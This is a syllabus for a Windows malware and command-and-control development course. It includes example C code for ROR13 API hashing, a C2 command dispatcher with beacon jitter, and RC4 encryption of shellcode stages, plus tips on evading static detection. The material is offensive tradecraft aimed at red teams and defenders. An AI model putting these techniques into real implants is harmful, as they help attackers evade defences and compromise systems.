Syllabus - Malware Development
STEROIDS
Malware and C2 Development
Training Program for Windows
Table Of Contents
Day 1
• Course Overview
• Development VM Setup
◦ MinGW GCC
◦ Netwide Assembler for x64 Assembly (NASM)
◦ Makefiles and Automation
• Command and Control Architecture
◦ Malware Lifecycle
◦ Payload Handler
◦ Staging Architecture
• Windows Internals
◦ Windows OS architecture
◦ Process & Thread Internals
◦ Debugging with WinDbg
▪ Thread Environment Block
▪ Process Environment Block
▪ Windows Loader Structure
▪ Introduction and Crash Course to WinDbg
• Windows Memory Protections
• Windows System Programming
• Debugging with x64dbg
◦ Introduction to x64dbg
◦ Introduction to x64 Intel Assembly
◦ Understanding x64 Registers and Stack
◦ Function calls in x86 vs x64 Assembly
◦ Hooking and Reversing WinAPIs/NTAPIs with x64dbg
◦ Trampoline vs. IAT Hooks
◦ Reversing EDR Trampoline Hooks
◦ Weaponizing Reversed Hooks
◦ Rewriting EDR Hooks
Day 2
• PE & DLL Structure
◦ Building Static and Dynamic DLLs
◦ COFF header
▪ Analyzing PE Structures
• Explorer Suite/CFF Explorer
• Process Hacker
◦ Stephen Fewer’s Reflective DLL Limitations
◦ Building a Custom Reflective DLL Loader
◦ String Hashing Algorithms
◦ Building a Custom Injector for Reflective DLL
◦ Modifying Reflective DLL’s PE Sections in Memory
◦ Allocations to avoid EDR Detections
◦ Hiding Memory Allocations with DLL/PE Image Spoofing
◦ Hiding Thread Creation with Instruction Pointer Spoofing
◦ Using NTAPIs for Reflection Reallocations
◦ Using Syscalls for Reflection Reallocations
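As an added illustration of the Day 2 "String Hashing Algorithms" topic (example code written for this page, not course material), the block below shows the ROR13-style API hashing a custom reflective loader or custom GetProcAddress uses in place of cleartext import names: only 4-byte hashes are embedded in the payload, and export names are resolved by comparing hashes. The sample export table, the ASCII-only handling of module names and the function names are constructed assumptions; a real resolver walks the PEB loader list and IMAGE_EXPORT_DIRECTORY, and its module hashes are computed over UTF-16 names.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Rotate-right-13 hash as popularised by Metasploit's block_api shellcode:
   each character is folded into a rolling 32-bit state. Only the 4-byte
   hash lives in the payload, so no API name string is present for a
   static scanner to match. */
static uint32_t ror32(uint32_t v, unsigned n) {
    return (v >> n) | (v << (32 - n));
}

/* Export names are case-sensitive in the PE export table, so hash as-is. */
uint32_t hash_export_name(const char *name) {
    uint32_t h = 0;
    for (; *name; ++name) {
        h = ror32(h, 13);
        h += (uint8_t)*name;
    }
    return h;
}

/* Module names are matched case-insensitively. A real loader reads them as
   UTF-16 from the PEB loader list and hashes every byte (interleaved NULs
   included); this example folds ASCII to upper case instead, an assumption
   that keeps it portable, so the values differ from Metasploit's tables. */
uint32_t hash_module_name(const char *name) {
    uint32_t h = 0;
    for (; *name; ++name) {
        h = ror32(h, 13);
        h += (uint8_t)toupper((unsigned char)*name);
    }
    return h;
}

/* Constructed stand-in for a module's export name table. A real resolver
   walks IMAGE_EXPORT_DIRECTORY.AddressOfNames and returns the matching
   AddressOfFunctions entry (via AddressOfNameOrdinals) instead of an index. */
static const char *const sample_exports[] = {
    "CreateThread", "LoadLibraryA", "VirtualAlloc",
    "VirtualProtect", "WriteProcessMemory",
};
#define N_EXPORTS (sizeof sample_exports / sizeof sample_exports[0])

/* Resolve an export by hash: the only comparison the payload performs. */
int find_export_by_hash(uint32_t wanted) {
    for (size_t i = 0; i < N_EXPORTS; ++i)
        if (hash_export_name(sample_exports[i]) == wanted)
            return (int)i;
    return -1;
}

/* Build-time helper: print the constants to stamp into the payload. */
int main(void) {
    for (size_t i = 0; i < N_EXPORTS; ++i)
        printf("0x%08x  %s\n", hash_export_name(sample_exports[i]), sample_exports[i]);
    printf("0x%08x  %s\n", hash_module_name("kernel32.dll"), "KERNEL32.DLL");
    return 0;
}
```

The build step runs main() once to obtain the constants; the payload carries only those constants and find_export_by_hash-style lookups. Note that a fixed, well-known hash scheme is itself a signature: detection tooling keeps tables of ROR13 hashes for common APIs, so operators typically change the rotation or add a per-build key.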
Day 3
• Windows Socket Programming
◦ Reverse Shells in C
◦ Bind Shells in C
• Buffer Redirection with Anonymous Pipes
• Named Pipe Lateral Movement
• Windows Access Tokens
• SpyC2 – Building your own CnC in python3, C and x64 Shellcode
• C2 Weaponization
◦ Building A Persistent Synchronous TCP C2
◦ Building an Asynchronous C2 with HTTP Callbacks
◦ Building Proxy-Aware Payloads
◦ Evading Network Detection & Response Tools for your CnC
◦ C2 Authentication
◦ Comm Encryption
◦ Sleep & Jitter
◦ C2 Round Robins
◦ URI Handling
◦ Payload Logging
◦ CnC Server OpSec Considerations
• Writing Function Pointer Arrays for Dynamic Command Execution in your C2 Payload
◦ Malware Functions
◦ Enumerating and Searching Processes
◦ Orthodox Memory Dumping Techniques
▪ MiniDumpWriteDump
▪ PssCreateSnapshot
◦ User Privilege Enumeration
◦ Host Enumeration
◦ Building Pluggable Modules for your Command & Control Server
• Building Reflective Staged Payloads
• Building Reflection Features Inside your Payloads to Load Existing Reflective DLLs as Modules
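As an added illustration of the Day 3 topics "Writing Function Pointer Arrays for Dynamic Command Execution" and "Sleep & Jitter" (example code written for this page, not course material), the block below is a minimal tasking dispatcher: the server sends a verb plus arguments, the payload looks the verb up in a static table of function pointers, and one of the handlers reconfigures the beacon interval. The verbs, handlers, the beacon structure and the jitter formula are constructed assumptions, not the course's SpyC2 design.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Every handler has the same shape: it receives the argument string and
   writes its result into out. Adding a capability means adding a handler
   and one table row; the dispatcher itself never changes. */
typedef int (*cmd_fn)(const char *args, char *out, size_t outlen);

/* Beacon timing, adjusted at run time by the sleep command. */
static struct { unsigned sleep_s; unsigned jitter_pct; } beacon = { 60, 20 };

static int cmd_echo(const char *args, char *out, size_t n) {
    snprintf(out, n, "%s", args);
    return 0;
}

static int cmd_sleep(const char *args, char *out, size_t n) {
    unsigned s, j;
    if (sscanf(args, "%u %u", &s, &j) != 2 || j > 100) {
        snprintf(out, n, "usage: sleep <seconds> <jitter 0-100>");
        return -1;                      /* config untouched on bad input */
    }
    beacon.sleep_s = s;
    beacon.jitter_pct = j;
    snprintf(out, n, "sleep=%us jitter=%u%%", s, j);
    return 0;
}

static int cmd_getcfg(const char *args, char *out, size_t n) {
    (void)args;
    snprintf(out, n, "sleep=%us jitter=%u%%", beacon.sleep_s, beacon.jitter_pct);
    return 0;
}

/* The function pointer array the server-side tasking is resolved against. */
static const struct { const char *verb; cmd_fn fn; } commands[] = {
    { "echo",   cmd_echo   },
    { "sleep",  cmd_sleep  },
    { "getcfg", cmd_getcfg },
};
#define N_COMMANDS (sizeof commands / sizeof commands[0])

/* Split "verb args..." and call the matching handler. Returns the handler's
   status, or -2 for an unknown, empty or over-long verb. */
int dispatch(const char *line, char *out, size_t outlen) {
    char verb[32];
    size_t vlen = strcspn(line, " ");
    if (vlen == 0 || vlen >= sizeof verb) {
        snprintf(out, outlen, "bad command");
        return -2;
    }
    memcpy(verb, line, vlen);
    verb[vlen] = '\0';
    const char *args = line + vlen;
    while (*args == ' ') ++args;
    for (size_t i = 0; i < N_COMMANDS; ++i)
        if (strcmp(verb, commands[i].verb) == 0)
            return commands[i].fn(args, out, outlen);
    snprintf(out, outlen, "unknown command: %s", verb);
    return -2;
}

/* Next check-in delay in milliseconds, spread uniformly over
   [sleep - jitter%, sleep + jitter%]. rnd is a 32-bit random value supplied
   by the caller (e.g. from BCryptGenRandom on Windows) so the arithmetic
   stays deterministic here. */
unsigned next_sleep_ms(uint32_t rnd) {
    unsigned base = beacon.sleep_s * 1000u;
    unsigned span = base * beacon.jitter_pct / 100u;
    unsigned offset = (unsigned)(((uint64_t)rnd * (2u * span + 1u)) >> 32);
    return base - span + offset;
}

/* Helper: run one tasking line and compare status and output. */
int dispatch_matches(const char *line, int want_rc, const char *want_out) {
    char out[128];
    int rc = dispatch(line, out, sizeof out);
    return rc == want_rc && strcmp(out, want_out) == 0;
}

int main(void) {
    const char *tasking[] = { "echo hello", "sleep 10 50", "getcfg", "selfdestruct" };
    char out[128];
    for (size_t i = 0; i < sizeof tasking / sizeof tasking[0]; ++i) {
        int rc = dispatch(tasking[i], out, sizeof out);
        printf("[%d] %s -> %s\n", rc, tasking[i], out);
    }
    printf("next sleep: %u ms\n", next_sleep_ms(0x80000000u));
    return 0;
}
```

The table is what makes the payload extensible without a parser rewrite, and keeping the verb comparison in one place is also where a string-hash lookup (so verbs never appear in cleartext) would be dropped in later.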
Day 4
• Basic Process Injections
◦ Shellcode Injection
◦ Remote Threads
◦ In-Memory File and Section mapping
◦ Asynchronous Procedure Calls
◦ PE/DLL Stomping
• X64 Position Independent Shellcoding
◦ Walking the PEB and hunting kernel32.dll, ntdll.dll, kernelbase.dll
◦ Position Independent Code in C
◦ Shellcode Stack alignment
◦ Writing a custom GetProcAddress in C
◦ Finding Syscalls Dynamically (on-the-fly)
◦ Extracting Shellcode from PIC
◦ Passing arguments to your shellcode
◦ In-Memory Object File Execution
◦ Thread Stack Spoofing
◦ Thread Start Address Spoofing
◦ Writing Stage Zero x64 Shellcode
◦ Writing Stage Server in Python3
• Process Heap Encryption
• Shellcode Encryption with RC4
• OpSec Considerations
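As an added illustration of the Day 4 topic "Shellcode Encryption with RC4" (example code written for this page, not course material), the block below implements RC4 from scratch, checks it against the published "Key"/"Plaintext" test vector, and shows the build-side step (encrypt a stage and emit it as a C array) next to the run-side step (decrypt in place immediately before use). The three-byte placeholder stage and the key are constructed; the Windows-specific part, decrypting into RW memory and flipping it to RX with VirtualProtect before execution, is described in the comments but not performed so the code runs anywhere.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RC4: key scheduling (KSA) followed by the output generator (PRGA), XORed
   over buf in place. The same call encrypts and decrypts. */
void rc4_crypt(const uint8_t *key, size_t keylen, uint8_t *buf, size_t len) {
    uint8_t S[256];
    if (keylen == 0) return;                 /* refuse an empty key */
    for (unsigned i = 0; i < 256; ++i) S[i] = (uint8_t)i;
    for (unsigned i = 0, j = 0; i < 256; ++i) {
        j = (j + S[i] + key[i % keylen]) & 0xff;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
    }
    for (size_t k = 0, i = 0, j = 0; k < len; ++k) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
        buf[k] ^= S[(S[i] + S[j]) & 0xff];
    }
}

/* Known-answer check: encrypt plain under key, compare the first n bytes
   with expect, then decrypt and confirm the plaintext comes back. */
int rc4_matches(const char *key, const char *plain, const uint8_t *expect, size_t n) {
    uint8_t buf[64];
    if (n > sizeof buf || strlen(plain) < n) return 0;
    memcpy(buf, plain, n);
    rc4_crypt((const uint8_t *)key, strlen(key), buf, n);
    if (memcmp(buf, expect, n) != 0) return 0;
    rc4_crypt((const uint8_t *)key, strlen(key), buf, n);   /* decrypt */
    return memcmp(buf, plain, n) == 0;
}

/* Constructed placeholder "stage" (x64 NOP, NOP, RET) standing in for a
   real position-independent payload. */
static const uint8_t demo_stage[] = { 0x90, 0x90, 0xC3 };

/* Build side: emit the encrypted bytes as a C array for the loader source. */
void emit_c_array(const char *name, const uint8_t *p, size_t n) {
    printf("static uint8_t %s[%zu] = {", name, n);
    for (size_t i = 0; i < n; ++i) printf("%s0x%02x", i ? "," : "", p[i]);
    printf("};\n");
}

int main(void) {
    const uint8_t key[] = "Key";             /* constructed; use a per-build key */
    uint8_t stage[sizeof demo_stage];
    memcpy(stage, demo_stage, sizeof stage);

    rc4_crypt(key, 3, stage, sizeof stage);  /* build side */
    emit_c_array("enc_stage", stage, sizeof stage);

    /* Run side: copy enc_stage into RW memory, decrypt, then VirtualProtect
       to PAGE_EXECUTE_READ and jump. Decrypt as late as possible so the
       cleartext stage is resident only while it is needed. */
    rc4_crypt(key, 3, stage, sizeof stage);
    printf("decrypted ok: %d\n", memcmp(stage, demo_stage, sizeof stage) == 0);

    static const uint8_t kat[] = { 0xBB,0xF3,0x16,0xE8,0xD9,0x40,0xAF,0x0A,0xD3 };
    printf("known answer: %d\n", rc4_matches("Key", "Plaintext", kat, sizeof kat));
    return 0;
}
```

RC4 here serves static-signature evasion, not confidentiality: a keystream cipher with a key embedded in the same binary offers no protection against anyone who has the loader, and it carries no integrity check, so a tampered stage decrypts to garbage and crashes rather than being rejected. A per-build key, or one derived from a host property (the "Process Heap Encryption" and environmental-keying ideas), is what keeps the encrypted blob from being a reusable signature itself.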
Target Audience
• Red Team members
• Penetration Testers
• Blue Teamers
• Threat Hunters
Requirements
• A laptop with 16GB RAM to support 2 VMs running at the same time.
• Basic Understanding of operating system architecture
• Basic understanding of programming concepts
• Experience with or knowledge of pointers, addresses in C and multi-threading/processing in Python3
• Strong will to learn and creative mindset.